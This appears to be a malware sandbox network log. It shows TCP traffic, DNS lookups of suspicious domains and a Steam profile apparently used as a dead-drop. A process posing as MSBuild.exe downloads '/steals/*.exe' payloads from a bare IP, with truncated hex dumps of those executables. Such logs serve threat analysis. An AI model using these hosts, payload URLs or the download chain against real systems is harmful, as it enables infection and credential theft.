Jul 26, 2024 18:57:26.812711000 CEST	49782	443	192.168.2.4	65.108.151.108
Jul 26, 2024 18:57:26.812967062 CEST	49782	443	192.168.2.4	65.108.151.108
Jul 26, 2024 18:57:26.812978029 CEST	443	49782	65.108.151.108	192.168.2.4
Jul 26, 2024 18:57:27.510883093 CEST	443	49782	65.108.151.108	192.168.2.4
Jul 26, 2024 18:57:27.510943890 CEST	49782	443	192.168.2.4	65.108.151.108
Jul 26, 2024 18:57:27.511387110 CEST	49782	443	192.168.2.4	65.108.151.108
Jul 26, 2024 18:57:27.511394024 CEST	443	49782	65.108.151.108	192.168.2.4
Jul 26, 2024 18:57:27.513127089 CEST	49782	443	192.168.2.4	65.108.151.108
Jul 26, 2024 18:57:27.513134956 CEST	443	49782	65.108.151.108	192.168.2.4
Jul 26, 2024 18:57:28.245485067 CEST	443	49782	65.108.151.108	192.168.2.4
Jul 26, 2024 18:57:28.245614052 CEST	49782	443	192.168.2.4	65.108.151.108
Jul 26, 2024 18:57:28.245637894 CEST	443	49782	65.108.151.108	192.168.2.4
Jul 26, 2024 18:57:28.245672941 CEST	443	49782	65.108.151.108	192.168.2.4
Jul 26, 2024 18:57:28.245729923 CEST	49782	443	192.168.2.4	65.108.151.108
Jul 26, 2024 18:57:28.245799065 CEST	49782	443	192.168.2.4	65.108.151.108
Jul 26, 2024 18:57:28.246047020 CEST	49782	443	192.168.2.4	65.108.151.108
Jul 26, 2024 18:57:28.246059895 CEST	443	49782	65.108.151.108	192.168.2.4
Jul 26, 2024 18:57:28.247440100 CEST	49783	443	192.168.2.4	65.108.151.108
Jul 26, 2024 18:57:28.247518063 CEST	443	49783	65.108.151.108	192.168.2.4
Jul 26, 2024 18:57:28.247600079 CEST	49783	443	192.168.2.4	65.108.151.108
Jul 26, 2024 18:57:28.247770071 CEST	49783	443	192.168.2.4	65.108.151.108
Jul 26, 2024 18:57:28.247792959 CEST	443	49783	65.108.151.108	192.168.2.4
Jul 26, 2024 18:57:28.968373060 CEST	443	49783	65.108.151.108	192.168.2.4
Jul 26, 2024 18:57:28.969306946 CEST	49783	443	192.168.2.4	65.108.151.108
Jul 26, 2024 18:57:28.969827890 CEST	49783	443	192.168.2.4	65.108.151.108
Jul 26, 2024 18:57:28.969835997 CEST	443	49783	65.108.151.108	192.168.2.4
Jul 26, 2024 18:57:28.971183062 CEST	49783	443	192.168.2.4	65.108.151.108
Jul 26, 2024 18:57:28.971189022 CEST	443	49783	65.108.151.108	192.168.2.4
Jul 26, 2024 18:57:29.722872019 CEST	443	49783	65.108.151.108	192.168.2.4
Jul 26, 2024 18:57:29.722929001 CEST	443	49783	65.108.151.108	192.168.2.4
Jul 26, 2024 18:57:29.722953081 CEST	49783	443	192.168.2.4	65.108.151.108
Jul 26, 2024 18:57:29.722979069 CEST	443	49783	65.108.151.108	192.168.2.4
Jul 26, 2024 18:57:29.722991943 CEST	49783	443	192.168.2.4	65.108.151.108
Jul 26, 2024 18:57:29.723021984 CEST	49783	443	192.168.2.4	65.108.151.108
Jul 26, 2024 18:57:29.723052979 CEST	443	49783	65.108.151.108	192.168.2.4
Jul 26, 2024 18:57:29.723191023 CEST	443	49783	65.108.151.108	192.168.2.4
Jul 26, 2024 18:57:29.723205090 CEST	49783	443	192.168.2.4	65.108.151.108
Jul 26, 2024 18:57:29.723402023 CEST	49783	443	192.168.2.4	65.108.151.108
Jul 26, 2024 18:57:29.723402023 CEST	49783	443	192.168.2.4	65.108.151.108
Jul 26, 2024 18:57:29.725024939 CEST	49784	443	192.168.2.4	65.108.151.108
Jul 26, 2024 18:57:29.725059032 CEST	443	49784	65.108.151.108	192.168.2.4
Jul 26, 2024 18:57:29.725152016 CEST	49784	443	192.168.2.4	65.108.151.108
Jul 26, 2024 18:57:29.725445986 CEST	49784	443	192.168.2.4	65.108.151.108
Jul 26, 2024 18:57:29.725461960 CEST	443	49784	65.108.151.108	192.168.2.4
Jul 26, 2024 18:57:30.031949043 CEST	49783	443	192.168.2.4	65.108.151.108
Jul 26, 2024 18:57:30.031979084 CEST	443	49783	65.108.151.108	192.168.2.4
Jul 26, 2024 18:57:30.417633057 CEST	443	49784	65.108.151.108	192.168.2.4
Jul 26, 2024 18:57:30.417857885 CEST	49784	443	192.168.2.4	65.108.151.108
Jul 26, 2024 18:57:30.418401003 CEST	49784	443	192.168.2.4	65.108.151.108
Jul 26, 2024 18:57:30.418412924 CEST	443	49784	65.108.151.108	192.168.2.4
Jul 26, 2024 18:57:30.420847893 CEST	49784	443	192.168.2.4	65.108.151.108
Jul 26, 2024 18:57:30.420852900 CEST	443	49784	65.108.151.108	192.168.2.4
Jul 26, 2024 18:57:31.171478033 CEST	443	49784	65.108.151.108	192.168.2.4
Jul 26, 2024 18:57:31.171503067 CEST	443	49784	65.108.151.108	192.168.2.4
Jul 26, 2024 18:57:31.171571970 CEST	49784	443	192.168.2.4	65.108.151.108
Jul 26, 2024 18:57:31.171590090 CEST	443	49784	65.108.151.108	192.168.2.4
Jul 26, 2024 18:57:31.171610117 CEST	49784	443	192.168.2.4	65.108.151.108
Jul 26, 2024 18:57:31.171664953 CEST	49784	443	192.168.2.4	65.108.151.108
Jul 26, 2024 18:57:31.172207117 CEST	49784	443	192.168.2.4	65.108.151.108
Jul 26, 2024 18:57:31.172226906 CEST	443	49784	65.108.151.108	192.168.2.4
Jul 26, 2024 18:57:31.174174070 CEST	49785	443	192.168.2.4	65.108.151.108
Jul 26, 2024 18:57:31.174216032 CEST	443	49785	65.108.151.108	192.168.2.4
Jul 26, 2024 18:57:31.174323082 CEST	49785	443	192.168.2.4	65.108.151.108
Jul 26, 2024 18:57:31.174540997 CEST	49785	443	192.168.2.4	65.108.151.108
Jul 26, 2024 18:57:31.174556971 CEST	443	49785	65.108.151.108	192.168.2.4
Jul 26, 2024 18:57:31.880305052 CEST	443	49785	65.108.151.108	192.168.2.4
Jul 26, 2024 18:57:31.880500078 CEST	49785	443	192.168.2.4	65.108.151.108
Jul 26, 2024 18:57:31.881037951 CEST	49785	443	192.168.2.4	65.108.151.108
Jul 26, 2024 18:57:31.881052017 CEST	443	49785	65.108.151.108	192.168.2.4
Jul 26, 2024 18:57:31.882734060 CEST	49785	443	192.168.2.4	65.108.151.108
Jul 26, 2024 18:57:31.882740974 CEST	443	49785	65.108.151.108	192.168.2.4
Jul 26, 2024 18:57:32.628839970 CEST	443	49785	65.108.151.108	192.168.2.4
Jul 26, 2024 18:57:32.628936052 CEST	443	49785	65.108.151.108	192.168.2.4
Jul 26, 2024 18:57:32.629260063 CEST	49785	443	192.168.2.4	65.108.151.108
Jul 26, 2024 18:57:32.629260063 CEST	49785	443	192.168.2.4	65.108.151.108
Jul 26, 2024 18:57:32.629461050 CEST	49785	443	192.168.2.4	65.108.151.108
Jul 26, 2024 18:57:32.629486084 CEST	443	49785	65.108.151.108	192.168.2.4
Jul 26, 2024 18:57:32.704911947 CEST	49786	443	192.168.2.4	65.108.151.108
Jul 26, 2024 18:57:32.704962015 CEST	443	49786	65.108.151.108	192.168.2.4
Jul 26, 2024 18:57:32.705034971 CEST	49786	443	192.168.2.4	65.108.151.108
Jul 26, 2024 18:57:32.705282927 CEST	49786	443	192.168.2.4	65.108.151.108
Jul 26, 2024 18:57:32.705297947 CEST	443	49786	65.108.151.108	192.168.2.4
Jul 26, 2024 18:57:33.442786932 CEST	443	49786	65.108.151.108	192.168.2.4
Jul 26, 2024 18:57:33.442893982 CEST	49786	443	192.168.2.4	65.108.151.108
Jul 26, 2024 18:57:33.443377018 CEST	49786	443	192.168.2.4	65.108.151.108
Jul 26, 2024 18:57:33.443389893 CEST	443	49786	65.108.151.108	192.168.2.4
Jul 26, 2024 18:57:33.445000887 CEST	49786	443	192.168.2.4	65.108.151.108
Jul 26, 2024 18:57:33.445012093 CEST	443	49786	65.108.151.108	192.168.2.4
Jul 26, 2024 18:57:33.445048094 CEST	49786	443	192.168.2.4	65.108.151.108
Jul 26, 2024 18:57:33.445060968 CEST	443	49786	65.108.151.108	192.168.2.4
Jul 26, 2024 18:57:33.704435110 CEST	49787	443	192.168.2.4	65.108.151.108
Jul 26, 2024 18:57:33.704495907 CEST	443	49787	65.108.151.108	192.168.2.4
Jul 26, 2024 18:57:33.704581976 CEST	49787	443	192.168.2.4	65.108.151.108
Jul 26, 2024 18:57:33.704826117 CEST	49787	443	192.168.2.4	65.108.151.108
Jul 26, 2024 18:57:33.704843044 CEST	443	49787	65.108.151.108	192.168.2.4
Jul 26, 2024 18:57:35.015736103 CEST	443	49786	65.108.151.108	192.168.2.4
Jul 26, 2024 18:57:35.015858889 CEST	49786	443	192.168.2.4	65.108.151.108
Jul 26, 2024 18:57:35.015877008 CEST	443	49786	65.108.151.108	192.168.2.4
Jul 26, 2024 18:57:35.015908003 CEST	443	49786	65.108.151.108	192.168.2.4
Jul 26, 2024 18:57:35.015928030 CEST	49786	443	192.168.2.4	65.108.151.108
Jul 26, 2024 18:57:35.015966892 CEST	49786	443	192.168.2.4	65.108.151.108
Jul 26, 2024 18:57:35.017083883 CEST	49786	443	192.168.2.4	65.108.151.108
Jul 26, 2024 18:57:35.017098904 CEST	443	49786	65.108.151.108	192.168.2.4
Jul 26, 2024 18:57:35.017539024 CEST	443	49787	65.108.151.108	192.168.2.4
Jul 26, 2024 18:57:35.017622948 CEST	49787	443	192.168.2.4	65.108.151.108
Jul 26, 2024 18:57:35.018070936 CEST	49787	443	192.168.2.4	65.108.151.108
Jul 26, 2024 18:57:35.018099070 CEST	443	49787	65.108.151.108	192.168.2.4
Jul 26, 2024 18:57:35.019634008 CEST	49787	443	192.168.2.4	65.108.151.108
Jul 26, 2024 18:57:35.019646883 CEST	443	49787	65.108.151.108	192.168.2.4
Jul 26, 2024 18:57:35.484772921 CEST	443	49787	65.108.151.108	192.168.2.4
Jul 26, 2024 18:57:35.484843016 CEST	443	49787	65.108.151.108	192.168.2.4
Jul 26, 2024 18:57:35.484889030 CEST	443	49787	65.108.151.108	192.168.2.4
Jul 26, 2024 18:57:35.484895945 CEST	49787	443	192.168.2.4	65.108.151.108
Jul 26, 2024 18:57:35.484927893 CEST	49787	443	192.168.2.4	65.108.151.108
Jul 26, 2024 18:57:35.484941959 CEST	443	49787	65.108.151.108	192.168.2.4
Jul 26, 2024 18:57:35.484975100 CEST	49787	443	192.168.2.4	65.108.151.108
Jul 26, 2024 18:57:35.485011101 CEST	49787	443	192.168.2.4	65.108.151.108
Jul 26, 2024 18:57:35.519510984 CEST	443	49787	65.108.151.108	192.168.2.4
Jul 26, 2024 18:57:35.519568920 CEST	443	49787	65.108.151.108	192.168.2.4
Jul 26, 2024 18:57:35.519618034 CEST	49787	443	192.168.2.4	65.108.151.108
Jul 26, 2024 18:57:35.519628048 CEST	443	49787	65.108.151.108	192.168.2.4
Jul 26, 2024 18:57:35.519654036 CEST	49787	443	192.168.2.4	65.108.151.108
Jul 26, 2024 18:57:35.519675016 CEST	49787	443	192.168.2.4	65.108.151.108
Jul 26, 2024 18:57:35.593391895 CEST	443	49787	65.108.151.108	192.168.2.4
Jul 26, 2024 18:57:35.593415022 CEST	443	49787	65.108.151.108	192.168.2.4
Jul 26, 2024 18:57:35.593638897 CEST	49787	443	192.168.2.4	65.108.151.108
Jul 26, 2024 18:57:35.593648911 CEST	443	49787	65.108.151.108	192.168.2.4
Jul 26, 2024 18:57:35.593697071 CEST	49787	443	192.168.2.4	65.108.151.108
Jul 26, 2024 18:57:35.633260012 CEST	443	49787	65.108.151.108	192.168.2.4
Jul 26, 2024 18:57:35.633307934 CEST	443	49787	65.108.151.108	192.168.2.4
Jul 26, 2024 18:57:35.633414030 CEST	49787	443	192.168.2.4	65.108.151.108
Jul 26, 2024 18:57:35.633424997 CEST	443	49787	65.108.151.108	192.168.2.4
Jul 26, 2024 18:57:35.633465052 CEST	49787	443	192.168.2.4	65.108.151.108
Jul 26, 2024 18:57:35.633465052 CEST	49787	443	192.168.2.4	65.108.151.108
Jul 26, 2024 18:57:35.669814110 CEST	443	49787	65.108.151.108	192.168.2.4
Jul 26, 2024 18:57:35.669857979 CEST	443	49787	65.108.151.108	192.168.2.4
Jul 26, 2024 18:57:35.669933081 CEST	49787	443	192.168.2.4	65.108.151.108
Jul 26, 2024 18:57:35.669941902 CEST	443	49787	65.108.151.108	192.168.2.4
Jul 26, 2024 18:57:35.669977903 CEST	49787	443	192.168.2.4	65.108.151.108
Jul 26, 2024 18:57:35.670010090 CEST	49787	443	192.168.2.4	65.108.151.108
Jul 26, 2024 18:57:35.698035955 CEST	443	49787	65.108.151.108	192.168.2.4
Jul 26, 2024 18:57:35.698049068 CEST	443	49787	65.108.151.108	192.168.2.4
Jul 26, 2024 18:57:35.698127985 CEST	49787	443	192.168.2.4	65.108.151.108
Jul 26, 2024 18:57:35.698137045 CEST	443	49787	65.108.151.108	192.168.2.4
Jul 26, 2024 18:57:35.698204041 CEST	49787	443	192.168.2.4	65.108.151.108
Jul 26, 2024 18:57:35.737859964 CEST	443	49787	65.108.151.108	192.168.2.4
Jul 26, 2024 18:57:35.737886906 CEST	443	49787	65.108.151.108	192.168.2.4
Jul 26, 2024 18:57:35.737926960 CEST	49787	443	192.168.2.4	65.108.151.108
Jul 26, 2024 18:57:35.737938881 CEST	443	49787	65.108.151.108	192.168.2.4
Jul 26, 2024 18:57:35.737953901 CEST	49787	443	192.168.2.4	65.108.151.108
Jul 26, 2024 18:57:35.737978935 CEST	49787	443	192.168.2.4	65.108.151.108
Jul 26, 2024 18:57:35.748744011 CEST	443	49787	65.108.151.108	192.168.2.4
Jul 26, 2024 18:57:35.748775005 CEST	443	49787	65.108.151.108	192.168.2.4
Jul 26, 2024 18:57:35.748835087 CEST	49787	443	192.168.2.4	65.108.151.108
Jul 26, 2024 18:57:35.748846054 CEST	443	49787	65.108.151.108	192.168.2.4
Jul 26, 2024 18:57:35.748867989 CEST	49787	443	192.168.2.4	65.108.151.108
Jul 26, 2024 18:57:35.748913050 CEST	49787	443	192.168.2.4	65.108.151.108
Jul 26, 2024 18:57:35.758583069 CEST	443	49787	65.108.151.108	192.168.2.4
Jul 26, 2024 18:57:35.758603096 CEST	443	49787	65.108.151.108	192.168.2.4
Jul 26, 2024 18:57:35.758649111 CEST	49787	443	192.168.2.4	65.108.151.108
Jul 26, 2024 18:57:35.758660078 CEST	443	49787	65.108.151.108	192.168.2.4
Jul 26, 2024 18:57:35.758675098 CEST	49787	443	192.168.2.4	65.108.151.108
Jul 26, 2024 18:57:35.758701086 CEST	49787	443	192.168.2.4	65.108.151.108
Jul 26, 2024 18:57:35.777878046 CEST	443	49787	65.108.151.108	192.168.2.4
Jul 26, 2024 18:57:35.777899981 CEST	443	49787	65.108.151.108	192.168.2.4
Jul 26, 2024 18:57:35.777959108 CEST	49787	443	192.168.2.4	65.108.151.108

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 26, 2024 18:56:04.235685110 CEST	192.168.2.4	1.1.1.1	0x3b60	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 18:56:51.977256060 CEST	192.168.2.4	1.1.1.1	0xde91	Standard query (0)	liernessfornicsa.shop	A (IP address)	IN (0x0001)	false
Jul 26, 2024 18:56:59.728902102 CEST	192.168.2.4	1.1.1.1	0x7a46	Standard query (0)	arpdabl.zapto.org	A (IP address)	IN (0x0001)	false
Jul 26, 2024 18:57:23.887597084 CEST	192.168.2.4	1.1.1.1	0xd473	Standard query (0)	t.me	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jul 26, 2024 18:56:04.246543884 CEST	1.1.1.1	192.168.2.4	0x3b60	No error (0)	steamcommunity.com		23.199.218.33	A (IP address)	IN (0x0001)	false
Jul 26, 2024 18:56:21.963500977 CEST	1.1.1.1	192.168.2.4	0x8689	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Jul 26, 2024 18:56:21.963500977 CEST	1.1.1.1	192.168.2.4	0x8689	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Jul 26, 2024 18:56:22.515996933 CEST	1.1.1.1	192.168.2.4	0x557d	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Jul 26, 2024 18:56:22.515996933 CEST	1.1.1.1	192.168.2.4	0x557d	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false
Jul 26, 2024 18:56:36.262675047 CEST	1.1.1.1	192.168.2.4	0xd1f	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Jul 26, 2024 18:56:36.262675047 CEST	1.1.1.1	192.168.2.4	0xd1f	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false
Jul 26, 2024 18:56:51.998325109 CEST	1.1.1.1	192.168.2.4	0xde91	No error (0)	liernessfornicsa.shop		172.67.213.85	A (IP address)	IN (0x0001)	false
Jul 26, 2024 18:56:51.998325109 CEST	1.1.1.1	192.168.2.4	0xde91	No error (0)	liernessfornicsa.shop		104.21.77.246	A (IP address)	IN (0x0001)	false
Jul 26, 2024 18:56:59.749250889 CEST	1.1.1.1	192.168.2.4	0x7a46	No error (0)	arpdabl.zapto.org		77.91.101.71	A (IP address)	IN (0x0001)	false
Jul 26, 2024 18:57:23.896430016 CEST	1.1.1.1	192.168.2.4	0xd473	No error (0)	t.me		149.154.167.99	A (IP address)	IN (0x0001)	false

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49757	147.45.44.104	80	7280	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 18:56:38.135025024 CEST	225	OUT	GET /steals/jen1hg.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 Host: 147.45.44.104 Cache-Control: no-cache
Jul 26, 2024 18:56:38.865869999 CEST	1236	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 16:56:38 GMT Server: Apache Last-Modified: Wed, 24 Jul 2024 19:26:38 GMT ETag: "4b3800-61e0341d0f4ad" Accept-Ranges: bytes Content-Length: 4929536 Content-Type: application/octet-stream Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 ae 6d 9f 66 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 bc 48 00 00 78 02 00 00 00 00 00 1e da 48 00 00 20 00 00 00 e0 48 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 4b 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d0 d9 48 00 4b 00 00 00 00 00 49 00 ec 70 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4b 00 0c 00 00 00 82 d9 48 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELmfHxH H@ K@HKIpKH H.text$H H `.sdataHH@.rsrcpIrH@@.relocK6K@B
Jul 26, 2024 18:56:38.865889072 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 da 48 00 00 00 00 00 48 00 00 00 02 00 05 00 34 b9 12 00 ec 9b 10 00 03 00 00 00 c2 00 00 06 20 55 23 00 62 84 25 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: HH4 U#b%Z+&+&((.+&(5:+&(+&+&^+&+&((.+&(5+&+&*0+&+&
Jul 26, 2024 18:56:38.865900040 CEST	1236	IN	Data Raw: 00 00 11 2b 02 26 16 00 03 fe 16 06 00 00 1b 6f 36 00 00 0a 00 03 12 00 fe 15 06 00 00 1b 06 81 06 00 00 1b 00 2a 00 5e 2b 02 26 16 2b 02 26 16 28 0b 35 00 06 00 02 28 1d 00 00 06 00 00 2a 13 30 03 00 19 00 00 00 0a 00 00 11 2b 02 26 16 00 02 03 Data Ascii: +&o6^+&+&(5(0+&(7(80+&(80+&( 80+&(!8+&+&:+&(8*J+&
Jul 26, 2024 18:56:38.865973949 CEST	1236	IN	Data Raw: 3a ee fe ff ff 26 20 56 02 00 00 28 cb 34 00 06 13 16 17 0c 20 05 00 00 00 38 d5 fe ff ff 20 da 02 00 00 28 7c 02 00 06 13 05 22 c7 56 51 41 13 06 20 09 00 00 00 38 b8 fe ff ff 20 44 01 00 00 28 cb 34 00 06 13 30 20 04 00 00 00 16 39 a1 fe ff ff Data Ascii: :& V(4 8 (\|"VQA 8 D(40 9&E (}:& (4 (}:m& (\|2 9R&"$A 8AH (~9.& 8 (\| 81-
Jul 26, 2024 18:56:38.865984917 CEST	1236	IN	Data Raw: 00 00 1f 50 0b 20 5e 08 00 00 28 cb 34 00 06 13 2f 17 13 0b 20 07 00 00 00 38 7a 00 00 00 20 70 0c 00 00 28 7c 02 00 06 13 04 20 1b 00 00 00 38 64 00 00 00 1f 3d 0c 1f 14 13 24 22 fe ca 12 42 13 15 20 19 00 00 00 38 4c 00 00 00 20 9e 09 00 00 28 Data Ascii: P ^(4/ 8z p(\| 8d=$"B 8L (4 86 ((4#"jB* 8"2B8 33E'Nz'dr.[v
Jul 26, 2024 18:56:38.865997076 CEST	1236	IN	Data Raw: 02 00 06 13 0b 20 04 00 00 00 38 f8 fd ff ff 22 90 ba 5f 42 13 07 20 13 00 00 00 38 e7 fd ff ff 17 13 16 20 0f 00 00 00 38 da fd ff ff 17 13 0c 20 00 00 00 00 28 7e 02 00 06 3a c8 fd ff ff 38 c3 fd ff ff 22 98 01 c7 42 0d 20 1a 00 00 00 38 b3 fd Data Ascii: 8"_B 8 8 (~:8"B 8"i'yB"(}9+& 8 (4 8\|*0+& 8 (\|% 8) 9& .(4."DA (\|
Jul 26, 2024 18:56:38.866009951 CEST	1236	IN	Data Raw: 27 20 96 15 00 00 28 7c 02 00 06 13 2b 20 e2 15 00 00 28 7c 02 00 06 13 0c 20 00 00 00 00 38 1f 00 00 00 17 13 06 1f 14 13 15 16 13 16 16 13 1a 38 6e ff ff ff 20 03 00 00 00 fe 0e 33 00 fe 0c 33 00 45 1c 00 00 00 10 ff ff ff 81 fe ff ff 1d ff ff Data Ascii: ' (\|+ (\| 88n 33Ej\/6q!:l\_G 8"@frA8& 8j8" 8\ j(\|
Jul 26, 2024 18:56:38.867201090 CEST	1236	IN	Data Raw: 02 26 16 20 16 00 00 00 38 b2 00 00 00 20 f6 1c 00 00 28 cb 34 00 06 13 14 22 65 4f 8c 42 13 31 16 0c 17 13 06 38 e0 01 00 00 26 20 05 00 00 00 16 39 89 00 00 00 26 17 13 0c 20 04 00 00 00 38 7b 00 00 00 20 c6 1a 00 00 28 cb 34 00 06 13 2f 20 34 Data Ascii: & 8 (4"eOB18& 9& 8{ (4/ 4(4 8Y":A 8H( 86 (\| :& \|(48 22E ;]2L
Jul 26, 2024 18:56:38.867211103 CEST	1236	IN	Data Raw: 59 40 42 13 1a 20 ba 21 00 00 28 7c 02 00 06 13 2e 20 e8 21 00 00 28 7c 02 00 06 13 25 20 18 00 00 00 38 5f 00 00 00 16 13 18 17 13 1c 20 01 00 00 00 16 39 4e 00 00 00 26 17 13 16 20 07 00 00 00 38 40 00 00 00 20 4c 23 00 00 28 cb 34 00 06 13 27 Data Ascii: Y@B !(\|. !(\|% 8_ 9N& 8@ L#(4' #(4 8 d!(48p 22E["`KmWu@,_m*>d
Jul 26, 2024 18:56:38.867223024 CEST	1116	IN	Data Raw: 02 00 06 13 17 20 07 00 00 00 38 4e 02 00 00 20 f8 2d 00 00 28 cb 34 00 06 0a 1f 38 13 2a 1f 39 13 29 16 0d 22 8a 44 43 42 13 24 1f 3b 13 1b 20 01 00 00 00 17 3a 23 02 00 00 26 22 4f c6 99 42 13 21 22 55 26 90 42 13 1d 20 13 00 00 00 38 0a 02 00 Data Ascii: 8N -(489)"DCB$; :#&"OB!"U&B 8 (}:& (~9&"6B- F-(\|%"A& 8"UA">A 8"A 8# 8"A(}(~:H&
Jul 26, 2024 18:56:39.053220987 CEST	1236	IN	Data Raw: b1 41 13 06 20 18 00 00 00 38 1d ff ff ff 22 39 0e 64 41 13 1d 22 af 28 6c 42 13 21 20 0c 00 00 00 38 05 ff ff ff 16 13 11 1f 5c 13 22 20 13 00 00 00 38 f4 fe ff ff 22 8f 02 a3 3f 13 15 1f 3f 13 13 20 0b 00 00 00 38 df fe ff ff 20 8e 2f 00 00 28 Data Ascii: A 8"9dA"(lB! 8\" 8"?? 8 /(4"aB /(4 8J0 8"-pB#8& (~:8"u%B+ (}:n& (.(\| 9U& ^.(\|( .(4$
Jul 26, 2024 18:56:46.271739006 CEST	225	OUT	GET /steals/gfn1go.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 Host: 147.45.44.104 Cache-Control: no-cache
Jul 26, 2024 18:56:46.557104111 CEST	1236	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 16:56:46 GMT Server: Apache Last-Modified: Wed, 24 Jul 2024 19:26:36 GMT ETag: "4df7e8-61e0341b8d2e0" Accept-Ranges: bytes Content-Length: 5109736 Content-Type: application/octet-stream Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 b3 6b 9f 66 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 80 4b 00 00 40 02 00 00 00 00 00 9e 9f 4b 00 00 20 00 00 00 a0 4b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 4e 00 00 04 00 00 06 6f 4e 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 9f 4b 00 4b 00 00 00 00 c0 4b 00 8c 38 02 00 00 00 00 00 00 00 00 00 10 dd 4d 00 d8 1a 00 00 00 00 4e 00 0c 00 00 00 05 9f 4b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELkfK@K K@ NoN@PKKK8MNK H.textK K `.sdataKK@.rsrc8K:K@@.relocNM@B

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	23.199.218.33	443	7280	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 16:56:05 UTC	119	OUT	GET /profiles/76561199747278259 HTTP/1.1 Host: steamcommunity.com Connection: Keep-Alive Cache-Control: no-cache
2024-07-26 16:56:05 UTC	1870	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Fri, 